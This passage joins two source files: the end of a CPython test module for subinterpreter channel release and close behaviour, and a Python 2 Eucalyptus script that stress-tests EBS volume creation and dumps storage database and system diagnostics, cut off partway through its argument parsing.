interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_channel_list_interpreters_invalid_channel(self):
cid = interpreters.channel_create()
# Test for invalid channel ID.
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_list_interpreters(1000, send=True)
interpreters.channel_close(cid)
# Test for a channel that has been closed.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
def test_channel_list_interpreters_invalid_args(self):
# Tests for invalid arguments passed to the API.
cid = interpreters.channel_create()
with self.assertRaises(TypeError):
interpreters.channel_list_interpreters(cid)
@unittest.skip("sgross: skip subinterpreter tests")
class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
ebs_stress.py
|
#!/usr/bin/python
#
#
# Description: This script encompasses test cases/modules concerning stressing EBS specific actions and
# features for Eucalyptus.
#
##########################
# #
# Test Cases #
# #
##########################
#
# [EbsStress]
#
# This case was developed to test the integrity of the following:
# * state of tgtd (Open iSCSI)
# * disk state of SC machine
# * PSQL database state of eucalyptus_storage table:
# - iscsivolumeinfo relation
# - volumes relation
# - iscsimetadata relation
# - storage_stats_info
# * PSQL database state of eucalyptus_cloud table:
# - metadata_volumes
# * Loopback device integrity
# * LVM integrity
# after stressing the SC with asynchronous volume create/delete calls.
#
# [GenerateVolumesLoad]
#
# This case was developed to test the creation of volumes in a serial manner.
# This case is a subcase of EbsStress.
#
# [GenerateCloudStatistics]
#
# This case was developed to provide statistical output of EBS related information
# for the cloud. Currently, it displays the following infromation:
# * number of creating, available, deleting, deleted, and failed volumes
# * PSQL database state of eucalyptus_storage table:
# - iscsivolumeinfo relation
# - volumes relation
# - iscsimetadata relation
# - storage_stats_info
# * PSQL database state of eucalyptus_cloud table:
# - metadata_volumes
#
#
# [EbsBotoStress]
#
# This case does the same as EbsStress, except it uses boto calls to create the volumes.
# This allows for create_volumes to be called without waiting for the volume to get into
# an available state. The volumes that do reach an "available" state are deleted in
# GenerateCloudStatistics.
#
# [GenerateVolumesBoto]
#
# This case was developed to test the creation of volumes in a serial manner using boto.
# This case is a subcase of EbsStressBoto.
#
#
import unittest
import time
from eucaops import Eucaops
from eutester import xmlrunner
import os
import re
import random
import argparse
import string
import sys
import pprint
import datetime
class LoadGenerator(unittest.TestCase):
def setUp(self):
# Setup basic eutester object
if options.config_file:
self.tester = Eucaops(config_file=options.config_file, password=options.clc_password)
else:
print "\tNeed to pass --config_file option. Try --help for more information\n"
exit(1)
### Grab zone for volume tests
zones = self.tester.ec2.get_all_zones()
self.zone = random.choice(zones).name
self.volumes = []
self.statuses = []
def tearDown(self):
"""
If extra debugging is set, print additional CLC and SC information
"""
if options.print_debug is True:
self.get_clc_stats()
self.get_sc_stats()
"""
Print the results of volumes created and total volumes of cloud
"""
self.current_ebs_reporting()
"""
Print all the volumes' statuses for the entire cloud
"""
self.overall_ebs_reporting()
"""
Display information in eucalyptus_storage,eucalyptus_cloud tables related to EBS -
* eucalyptus_storage relations: iscsivolumeinfo, iscsimetadata, volumes, storage_stats_info
* eucalyptus_cloud relations: metadata_volumes
"""
self.iscivolumeinfo_db_dump()
self.iscsimetadata_db_dump()
self.volumes_db_dump()
self.cloudmetadata_db_dump()
self.storagestats_db_dump()
"""
Now destroy volumes created and reached available state from test
"""
for vol in self.volumes:
if vol.status == 'available':
self.tester.delete_volume(vol)
self.volumes = None
self.statuses = None
self.tester = None
def current_ebs_reporting(self):
"""
Print the results of volumes created and total volumes of cloud
"""
found_creating = self.statuses.count("creating")
found_available = self.statuses.count("available")
found_deleting = self.statuses.count("deleting")
found_deleted = self.statuses.count("deleted")
found_failed = self.statuses.count("failed")
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Results of Finished Test ****\n")
self.tester.debug("\t" + str(found_creating) + " Volumes in CREATING state.\n")
self.tester.debug("\t" + str(found_available) + " Volumes in AVAILABLE state.\n")
self.tester.debug("\t" + str(found_deleting) + " Volumes in DELETING state.\n")
self.tester.debug("\t" + str(found_deleted) + " Volumes in DELETED state.\n")
self.tester.debug("\t" + str(found_failed) + " Volumes in FAILED state.\n")
self.tester.debug("##########################################\n")
found_creating = None
found_available = None
found_deleting = None
found_deleted = None
found_failed = None
def overall_ebs_reporting(self):
"""
Print all the volumes' statuses for the entire cloud
"""
volumes = self.tester.get_volumes()
statuses = []
for master_vol in volumes:
statuses.append(master_vol.status)
overall_creating = statuses.count("creating")
overall_available = statuses.count("available")
overall_deleting = statuses.count("deleting")
overall_deleted = statuses.count("deleted")
overall_failed = statuses.count("failed")
"""
Grab cloud property for volume location to get stats of files.
"""
volumes_dir = ""
for machine in self.tester.get_component_machines("clc"):
if volumes_dir == "":
volumes_dir = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep volumesdir | awk '{print $3}'"))
overall_ebs_size = len(volumes)
ebs_filesystem_size = ""
for machine in self.tester.get_component_machines("sc"):
ebs_filesystem_size = (machine.sys("du -sh " + volumes_dir[0]))
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Results of Current Volumes on Cloud ****\n")
self.tester.debug("\t" + str(overall_creating) + " Volumes in CREATING state.\n")
self.tester.debug("\t" + str(overall_available) + " Volumes in AVAILABLE state.\n")
self.tester.debug("\t" + str(overall_deleting) + " Volumes in DELETING state.\n")
self.tester.debug("\t" + str(overall_deleted) + " Volumes in DELETED state.\n")
self.tester.debug("\t" + str(overall_failed) + " Volumes in FAILED state.\n")
self.tester.debug("==========================================\n")
self.tester.debug("Sum of All EBS Volume Sizes (in GBs): " + str(overall_ebs_size) + "\n")
self.tester.debug("Disk Space Used under Cloud defined Storage Directory [ " + volumes_dir[0] + " ]: " + ebs_filesystem_size[0] + "\n")
self.tester.debug("##########################################\n")
"""
Make sure and clean up volumes that got to "available" state; this is mostly for EbsBotoStress cleanup
"""
for vol in volumes:
if vol.status == 'available':
self.tester.delete_volume(vol)
"""
Clean up everything else
"""
statuses = None
volumes = None
ebs_filesystem_size = None
overall_ebs_size = None
volumes_dir = None
overall_creating = None
overall_available = None
overall_deleting = None
overall_deleted = None
overall_failed = None
def iscivolumeinfo_db_dump(self):
"""
Print contents of iscsivolumeinfo relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
iscsivolinfo_file = "~/iscsivolinfo_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from iscsivolumeinfo' -o " + iscsivolinfo_file)
db_dump = (machine.sys("cat " + iscsivolinfo_file))
machine.sys("rm -rf " + iscsivolinfo_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of iscsivolumeinfo relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
iscsivolinfo_file = None
db_dump = None
def iscsimetadata_db_dump(self):
"""
Print contents of iscsimetadata relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
iscsimetadata_file = "~/iscsimetadata_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from iscsimetadata' -o " + iscsimetadata_file)
db_dump = (machine.sys("cat " + iscsimetadata_file))
machine.sys("rm -rf " + iscsimetadata_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of iscsimetadata relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
iscsimetadata_file= None
db_dump = None
def volumes_db_dump(self):
"""
Print contents of volumes relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
volumes_file = "~/volumes_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from volumes' -o " + volumes_file)
db_dump = (machine.sys("cat " + volumes_file))
machine.sys("rm -rf " + volumes_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of volume relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
volumes_file= None
db_dump = None
def cloudmetadata_db_dump(self):
"""
Print contents of metadata_volumes relation in eucalyptus_cloud table
"""
now = datetime.datetime.now()
cloudmetadata_file = "~/cloudmetadata_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_cloud -c 'select * from metadata_volumes' -o " + cloudmetadata_file)
db_dump = (machine.sys("cat " + cloudmetadata_file))
machine.sys("rm -rf " + cloudmetadata_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of metadata_volumes relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
cloudmetadata_file= None
db_dump = None
def storagestats_db_dump(self):
"""
Print contents of storage_stats_info relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
storagestats_file = "~/storagestats_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from storage_stats_info' -o " + storagestats_file)
db_dump = (machine.sys("cat " + storagestats_file))
machine.sys("rm -rf " + storagestats_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of storage_stats_info relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
storagestats_file= None
db_dump = None
def run_command_list(self,machine, list):
for command in list:
machine.sys(command)
def get_clc_stats(self):
basic_commands = ['df -B M',
'ps aux',
'free',
'uptime']
clc_commands = ['euca-describe-properties | grep volume']
clc_status = clc_commands + basic_commands
for machine in self.tester.get_component_machines("clc"):
for command in clc_status:
machine.sys("source " + self.tester.credpath + "/eucarc && " + command)
def get_sc_stats(self):
basic_commands = ['df -B M',
'ps aux',
'free',
'uptime']
"""
Grab cloud property for volume location to get stats of files.
"""
volumes_dir = ""
for machine in self.tester.get_component_machines("clc"):
if volumes_dir == "":
volumes_dir = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep volumesdir | awk '{print $3}'"))
sc_commands = ['tgtadm --lld iscsi --op show --mode account',
'tgtadm --lld iscsi --op show --mode target',
'du -sh ' + volumes_dir[0],
'lvdisplay | grep "/dev/vg-"',
'vgdisplay',
'pvdisplay',
'losetup -a | grep ' + volumes_dir[0] + ' | wc -l',
'ls -l ' + volumes_dir[0]]
sc_status = basic_commands + sc_commands
for machine in self.tester.get_component_machines("sc"):
self.run_command_list(machine, sc_status)
def GenerateVolumesLoad(self):
"""
Grab EBS Timeout property of Cloud
"""
ebs_timeout = ""
for machine in self.tester.get_component_machines("clc"):
if ebs_timeout == "":
ebs_timeout = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep ebs_volume_creation_timeout | awk '{print $3}'"))
"""
Create volumes in series
"""
for i in xrange(options.number_of_vol):
volume = self.tester.create_volume(self.zone)
if volume is not None:
self.volumes.append(volume)
self.statuses.append(volume.status)
"""
Sleep the EBS Timeout property; only have to call it once
"""
self.tester.debug("###\n")
self.tester.debug("###\tWaiting till EBS Timeout is reached; sleep for " + ebs_timeout[0] + " seconds.\n")
self.tester.debug("###\n")
self.tester.sleep(float(ebs_timeout[0]))
def GenerateVolumesBoto(self):
"""
Grab EBS Timeout property of Cloud
"""
ebs_timeout = ""
for machine in self.tester.get_component_machines("clc"):
if ebs_timeout == "":
ebs_timeout = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep ebs_volume_creation_timeout | awk '{print $3}'"))
"""
Create 1 Gig volumes in series
"""
vol_size = 1
for i in xrange(options.number_of_vol):
volume = self.tester.ec2.create_volume(vol_size, self.zone)
if volume is not None:
self.tester.debug("Volume (" + volume.id + ") is in (" + volume.status + ") state.\n")
self.volumes.append(volume)
self.statuses.append(volume.status)
"""
Sleep the EBS Timeout property; only have to call it once
"""
self.tester.debug("###\n")
self.tester.debug("###\tWaiting till EBS Timeout is reached; sleep for " + ebs_timeout[0] + " seconds.\n")
self.tester.debug("###\n")
self.tester.sleep(float(ebs_timeout[0]))
def GenerateCloudStatistics(self):
"""
Grab status of all volumes on cloud, along with database information
"""
self.overall_ebs_reporting()
"""
Display information in eucalyptus_storage,eucalyptus_cloud tables related to EBS -
* eucalyptus_storage relations: iscsivolumeinfo, iscsimetadata, volumes, storage_stats_info
* eucalyptus_cloud relations: metadata_volumes
"""
self.iscivolumeinfo_db_dump()
self.iscsimetadata_db_dump()
self.volumes_db_dump()
self.cloudmetadata_db_dump()
self.storagestats_db_dump()
def EbsStress(self, testcase="GenerateVolumesLoad"):
"""
Generate volume load; For each thread created - options.number_of_threads
- options.number_of_vol will be created
"""
from multiprocessing import Process
from multiprocessing import Queue
### Increase time to by step seconds on each iteration
### This also gives enough time for creds to be pulled from CLC
step = 10
"""
If extra debugging is set, print additional CLC and SC information
"""
if options.print_debug is True:
self.get_clc_stats()
self.get_sc_stats()
thread_pool = []
queue_pool = []
## Start asynchronous activity
## Run GenerateVolumesLoad testcase seconds apart
for i in xrange(options.number_of_threads):
q = Queue()
queue_pool.append(q)
p = Process(target=self.run_testcase_thread, args=(q, step * i,testcase))
thread_pool.append(p)
self.tester.debug("Starting Thread " + str(i) +" in " + str(step * i))
p.start()
fail_count = 0
### Block until the script returns a result
for queue in queue_pool:
test_result = queue.get(True)
self.tester.debug("Got Result: " + str(test_result) )
fail_count += test_result
for thread in thread_pool:
thread.join()
if fail_count > 0:
self.tester.critical("Failure detected in one of the " + str(fail_count) + " " + testcase + " tests")
self.tester.debug("Successfully completed EbsStress test")
def EbsBotoStress(self, testcase="GenerateVolumesBoto"):
"""
Generate volume load; For each thread created - options.number_of_threads
- options.number_of_vol will be created
"""
from multiprocessing import Process
from multiprocessing import Queue
### Increase time to by step seconds on each iteration
### This also gives enough time for creds to be pulled from CLC
step = 10
"""
If extra debugging is set, print additional CLC and SC information
"""
if options.print_debug is True:
self.get_clc_stats()
self.get_sc_stats()
thread_pool = []
queue_pool = []
## Start asynchronous activity
## Run GenerateVolumesLoad testcase seconds apart
for i in xrange(options.number_of_threads):
q = Queue()
queue_pool.append(q)
p = Process(target=self.run_testcase_thread, args=(q, step * i,testcase))
thread_pool.append(p)
self.tester.debug("Starting Thread " + str(i) +" in " + str(step * i))
p.start()
fail_count = 0
### Block until the script returns a result
for queue in queue_pool:
test_result = queue.get(True)
self.tester.debug("Got Result: " + str(test_result) )
fail_count += test_result
for thread in thread_pool:
thread.join()
if fail_count > 0:
self.tester.critical("Failure detected in one of the " + str(fail_count) + " " + testcase + " tests")
self.tester.debug("Successfully completed EbsBotoStress test")
def run_testcase_thread(self, queue,delay=20, testname=None):
### Thread that runs a testcase (function) and returns its pass or fail result
self.tester.sleep(delay)
try:
result = unittest.TextTestRunner(verbosity=2).run(LoadGenerator(testname))
except Exception, e:
queue.put(1)
raise e
if result.wasSuccessful():
self.tester.debug("Passed test: " + testname)
queue.put(0)
return False
else:
self.tester.debug("Failed test: " + testname)
queue.put(1)
return True
def get_options():
### Parse args
## If given command line arguments, use them as test names to launch
parser = argparse.ArgumentParser(prog="ebs_stress.py",
version="Test Case [ebs_stress.py] Version 0.0.1",
description='Run stress testing operations on a cloud to test Eucalyptus Storage Controller \
functionality. This also tests disk, database, lvm, and loopback device integrity before and \
after the test has been executed.')
parser.add_argument("-U", "--username", dest="username",
help="User account on physical CC and CLC machine", default="root")
parser.add_argument("--clc-password", dest="clc_password",
help="Password for user account on physical CLC machine", default=None)
parser.add_argument("--config_file", dest="config_file",
help="Cloud config of AZ", default=None)
parser.add_argument("-n", "--number", dest="number_of_vol", type=int,
help="Number of volumes to create", default=10)
parser.add_argument("-t", "--thread_number", dest="number_of_threads", type=int,
